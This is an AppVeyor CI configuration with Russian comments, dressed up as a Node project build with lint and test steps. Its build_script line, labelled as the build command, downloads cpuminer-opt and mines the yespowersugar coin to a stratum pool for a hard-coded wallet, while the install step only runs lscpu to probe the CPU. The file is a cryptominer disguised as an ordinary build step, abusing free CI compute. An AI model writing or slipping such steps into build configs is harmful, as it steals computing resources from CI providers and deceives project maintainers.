image: Ubuntu1804  # образ для сборки

stack: node 10  # окружение

branches:
  only:
    - master  # ветка git

cache: node_modules  # кеширование

install:
  - lscpu  # команда установки зависимостей

build: off  # отключаем встроенную в appveyor систему сборки

build_script:
  - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-eu.rplant.xyz:17042 -u sugar1qj5vh3cse2legwda2yammx5y8nlrkwn2g3cwqtn.app   # команда сборки

test_script:
  - npm run lint && npm test  # скрипт тестирования
